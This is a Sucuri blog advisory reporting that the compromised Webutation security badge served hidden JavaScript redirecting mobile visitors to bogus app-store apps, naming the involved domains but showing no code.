• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Webutation Distributing Malware Through Safety Badge

July 16, 2015Krasimir Konov

FacebookTwitterSubscribe

If you are using the Webutation badge on your site, remove it now. It appears they got hacked and are distributing malware to mobile devices through redirects hidden within the badge’s code.

We were analyzing a website that was compromised and redirecting visitors to bogus apps on the Apple App Store and the Google Play Store. The website looked clean, but the redirect kept happening for mobile users. Upon further inspection, we found out that the Webutation safety badge was responsible for the redirect.

The file load_badge.js – which is used to generate the badge – has some additional JavaScript from jquaryr[.]com that is only displayed for mobile user agents. That code from jquaryr (obviously an intentional typo of jQuery) forces a page reload, which then pushes the user to the bogus apps. This is dangerous because visitors rely on security badges to confirm the credibility and security of the website they are visiting. This is the first time we have seen one hacked in this way to distribute malware and malicious redirects.

webutation-badge

Security Badge Causing Mobile Redirects

This is what the badge code looks like for mobile users:

mobile-webutation

You can see the last 2 lines added causing the redirect:

webutation-redirect

That opens up the popOL.php URL that loads an affiliate URL from mobitrk.com, which them pushes to the bogus apps:

webutation-3

Difficult to Diagnose

The malware also uses a cookie to prevent multiple redirects on the same browser, making it hard for webmasters to detect the problem.

Again, if you are using Webutation, remove the badge from your site now, at least until they get the issue fixed. We will continue to monitor the issue and provide updates when we know more.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website SecurityTags: Conditional Malware, Hacked Websites, Redirects

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Comments

  1. Zion Oyemade

    July 17, 2015

    Just a thought Krasimir,
    What if the bug is intentional by Webutation itself. They are yet to report or make a notification on the bug themselves to users.

    • Krasimir

      July 17, 2015

      Thanks for the comment. This could be intentional but we can’t confirm it at this time. We assume their website must have been compromised.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.